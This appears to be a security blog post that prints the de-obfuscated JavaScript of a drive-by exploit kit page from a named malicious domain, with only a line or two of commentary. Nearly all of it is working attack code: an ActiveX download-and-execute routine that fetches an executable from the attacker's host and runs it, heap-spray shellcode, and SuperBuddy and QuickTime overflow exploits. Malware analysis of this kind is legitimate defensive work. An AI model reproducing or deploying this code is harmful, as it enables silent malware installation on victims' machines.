bdydcketn.com/cgi-bin/index.cgi?mentat

the obfuscation method has been improved to defeat eval() overloading.
check out https://s3cwatch.wordpress.com/de-obfuscate-javascript-2/

The final decoded JS is as follows:

function O67OIL_S(pS1TKjZw)
{
var Tc6cGkJB = "abcdefghiklmnopqrstuvwxyz0123456789";
var kUUULHYt = '';
for (var hDfiZeOa=0; hDfiZeOa<pS1TKjZw; hDfiZeOa++) {
var jsUi5gXl = Math.floor(Math.random() * Tc6cGkJB.length);
kUUULHYt += Tc6cGkJB.substring(jsUi5gXl, jsUi5gXl+1);
}

return kUUULHYt;
}

function g_KRRWml(uWvOWnll, U83q7uSO)
{
var B2k7pLyj = null;
var loDdwyvv = 'B2k7pLyj=uWvOWnll.';
var UIT35FaR = new Array(
'CreateObject(U83q7uSO)',
'CreateObject(U83q7uSO, "")',
'CreateObject(U83q7uSO, "", "")',
'GetObject("", U83q7uSO)',
'GetObject(U83q7uSO, "")',
'GetObject(U83q7uSO)'
);

var CEpnV6hW=0;

while(!B2k7pLyj && CEpnV6hW < UIT35FaR.length) {
try {
eval(loDdwyvv+UIT35FaR[CEpnV6hW]);
} catch(e) { }

CEpnV6hW++;
}

return B2k7pLyj;
}

function q_huKEGP(RJ8oL8br, LQz9pLDR)
{

try {
RJ8oL8br.open("GET", LQz9pLDR, false);
RJ8oL8br.send(null);

} catch(e) { return 0; }

return RJ8oL8br.responseBody;
}

function XkTvXDCJ(zaGikQAq, zb4iz1oQ, W85kCZrw)
{

try {
zaGikQAq.Type = 1;
zaGikQAq.Mode = 3;
zaGikQAq.Open();
zaGikQAq.Write(W85kCZrw);
zaGikQAq.SaveToFile(zb4iz1oQ, 2);
zaGikQAq.Close();
} catch(e) { return 0; }

return 1;
}

function UtaReQBl(HieKcOMz, RJ8oL8br, zaGikQAq, VOgWb3Cn, pADpe5al)
{
var TAESYazX = 0;
var ezLtKohw = q_huKEGP(RJ8oL8br, HieKcOMz);

if (ezLtKohw != 0) {
var gOl2BTRU = "c:\\"+O67OIL_S(6)+".exe";

if (XkTvXDCJ(zaGikQAq, gOl2BTRU, ezLtKohw) == 1) {
if (pADpe5al == 0) {
try {
VOgWb3Cn.Run(gOl2BTRU, 0);
TAESYazX = 1;
} catch(e) { }
} else {
try {
VOgWb3Cn.ShellExecute(gOl2BTRU, "", "", "open", 0);
TAESYazX = 1;
} catch(e) { }
}
}
}

return TAESYazX;
}

function YtbTDiYx()
{
var LtzS6jMJ = 0;
var UFCXmdEO = 1;
var KXJKun7V = "http://bdydcketn.com/cgi-bin/index.cgi?8457cb140100f06002f7f5ea65060000000002ccbdf3c90003040900000000020";
var eLJLMEPW = new Array(null, null, null);

try {
var Bc74I86U = 0;
var dlx54cQH = document.createElement("object");
dlx54cQH.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (dlx54cQH) {
eLJLMEPW[0] = g_KRRWml(dlx54cQH, "msxml2.XMLHTTP");
if (!eLJLMEPW[0])
eLJLMEPW[0] = g_KRRWml(dlx54cQH, "Microsoft.XMLHTTP");

if (!eLJLMEPW[0])
eLJLMEPW[0] = g_KRRWml(dlx54cQH, "MSXML2.ServerXMLHTTP");

eLJLMEPW[1] = g_KRRWml(dlx54cQH, "ADODB.Stream");

eLJLMEPW[2] = g_KRRWml(dlx54cQH, "WScript.Shell");

if (!eLJLMEPW[2]) {
eLJLMEPW[2] = g_KRRWml(dlx54cQH, "Shell.Application");
if (eLJLMEPW[2]) Bc74I86U = 1;
}
}

if (eLJLMEPW[0] && eLJLMEPW[1] && eLJLMEPW[2]) {
for(var LfrFmb6q=0;LfrFmb6q<UFCXmdEO;LfrFmb6q++) {
var rNTUvx7f = UtaReQBl(KXJKun7V+LfrFmb6q.toString(), eLJLMEPW[0], eLJLMEPW[1], eLJLMEPW[2], Bc74I86U);

if (!LtzS6jMJ)
LtzS6jMJ = rNTUvx7f;
}
}

} catch(e) {}

return LtzS6jMJ;
}

function Sjifmt_v(m7MaRRjU, og273Ccz)
{
try {

var bt8N3Pdz = new Date();
bt8N3Pdz.setDate(bt8N3Pdz.getDate() + 120000);

if (m7MaRRjU) {
document.cookie =
"id=" + m7MaRRjU +
"; path=/" +
"; expires=" + bt8N3Pdz.toGMTString();
}

if (og273Ccz) {
document.cookie =
"addt=" + og273Ccz +
"; path=/" +
"; expires=" + bt8N3Pdz.toGMTString();
}

} catch(e) {
}
}

var f80dryHg = new Array();
var Zr5u7htF = 0;

function p78sArRj()
{
f80dryHg = f80dryHg;
setTimeout(p78sArRj, 100);
}

function sq5fMuoL(QeB2OcFI, a7_qIAMV)
{
while (QeB2OcFI.length*2<a7_qIAMV)
QeB2OcFI += QeB2OcFI;

QeB2OcFI = QeB2OcFI.substring(0,a7_qIAMV/2);
return QeB2OcFI;
}

function CkIZS6Ul()
{
if (!Zr5u7htF) {
var LD7rcyEm = 0x0c0c0c0c;
var pHxme6qt = unescape("%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%uc583%ub914%u0190%u0000%u42b0%u4530%u4500%u7549%uebf9%ud200%ud2d2%ud2d2%ud2d2%uabd2%u42be%u4242%u261d%u72e3%u4242%u3a42%uc94e%u4e02%u32c9%uef5e%u2ac9%ua94a%uc94b%u7602%u02cf%uc93e%u7e2a%ub5c9%u4628%uaa1b%u42cd%u4242%ubba0%u2d2a%u422c%u2a42%u3037%u2f2e%ubd16%uc954%uaaaa%u423b%u4242%u95c9%uc205%u427d%ub837%u1505%uc205%u427d%ub837%uadc9%u711d%uc38b%u46ae%u4243%uc942%u139e%u1110%u462a%u4243%ubd42%u4e14%u1b18%u1013%u40c9%u0111%u79c2%u3742%uc3b8%ube39%u276c%u273a%u4137%ua9c1%ucb4a%u8541%u4601%u276c%u273a%u0184%u424a%uc819%u4683%uca72%u4207%u8271%u1212%u1511%ubd12%u5214%ubac1%u3742%u2844%u1143%u14bd%u1846%uc11b%u4680%uc203%u4278%uf637%u14bd%u134a%uc914%u7e37%u36c9%u3a6c%ub741%uc914%u6234%ub741%u8b71%u030b%u41ef%u7187%u4d99%u52fc%u9478%u4a36%u8983%u414f%u0298%ub3a9%u5d79%ua537%uc91c%u661c%u9f41%uc924%u094e%u1cc9%u415e%uc99f%uc946%u8741%u1ce9%u811b%ubdaa%ubdbc%uccbd%u4c0c%udaae%uc8bc%u3c4c%ua09a%u7131%uc888%u7419%u6d58%u1332%u0512%u4209%u362a%u3236%u6d78%u206d%u3b26%u2126%u2729%u2c36%u216c%u2f2d%u216d%u2b25%u206f%u2c2b%u2b6d%u262c%u3a27%u216c%u2b25%u7a7d%u7776%u2175%u7320%u7276%u7273%u2472%u7472%u7272%u2470%u2475%u2777%u7423%u7277%u7274%u7272%u7272%u7272%u7272%u2170%u2021%u2426%u2171%u727b%u7272%u7271%u7276%u727b%u7272%u7272%u7272%u7272%u727a%u0042");
var HBy2dCNo = 0x400000;
var Ei0FS4qV = pHxme6qt.length * 2;
var a7_qIAMV = HBy2dCNo - (Ei0FS4qV+0x38);
var QeB2OcFI = unescape("%u0c0c%u0c0c");

QeB2OcFI = sq5fMuoL(QeB2OcFI,a7_qIAMV);
var vgdtraWv = (LD7rcyEm - 0x400000)/HBy2dCNo;

for (var vTHkiftk=0;vTHkiftk<vgdtraWv;vTHkiftk++) {
f80dryHg[vTHkiftk] = QeB2OcFI + pHxme6qt;
}

Zr5u7htF = 1;
p78sArRj();
}

return 0;
}

function OvYFIyVw() {

try {
var lg0F974W = new ActiveXObject('Sb.SuperBuddy');

if (lg0F974W) {
CkIZS6Ul();
Sjifmt_v(9);
lg0F974W.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

function nNknR84g()
{
try {
var if7Fs_5L = new ActiveXObject("QuickTime.QuickTime.4");

if (if7Fs_5L) {
CkIZS6Ul();
var dVnvdJiz = "";
for(var njQYrL3J=0;njQYrL3J<200;njQYrL3J++) {
dVnvdJiz += "AAAA";
}

dVnvdJiz += "AAA";

for(var njQYrL3J=0;njQYrL3J<3;njQYrL3J++) {
dVnvdJiz += "\x0c\x0c\x0c\x0c";
}

var EuIHRPqG =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://bdydcketn.com/cgi-bin/index.cgi?8457cb140100f06001f7f5ea65060000000002ccbdf3c9000304090000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://AXDOF:' + dVnvdJiz +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

t6u3tEIn = 0;
var Mx38Q5Cx = document.createElement("div");
Mx38Q5Cx.innerHTML = EuIHRPqG;
Sjifmt_v(6);
document.body.appendChild(Mx38Q5Cx);

}
} catch(e) {
}

return 0;
}
if (YtbTDiYx() || OvYFIyVw() || nNknR84g()
) {
document.IGsrplJc = 'about:blank';
} else {
document.IGsrplJc = 'about:blank';
}

/*setTimeout(function() {
if (document.t6u3tEIn && document.J23g5cfS && document.jntefJDI) {
setTimeout("window.location = '" + document.IGsrplJc + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

The VT analysis of KXJKun7V is here

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: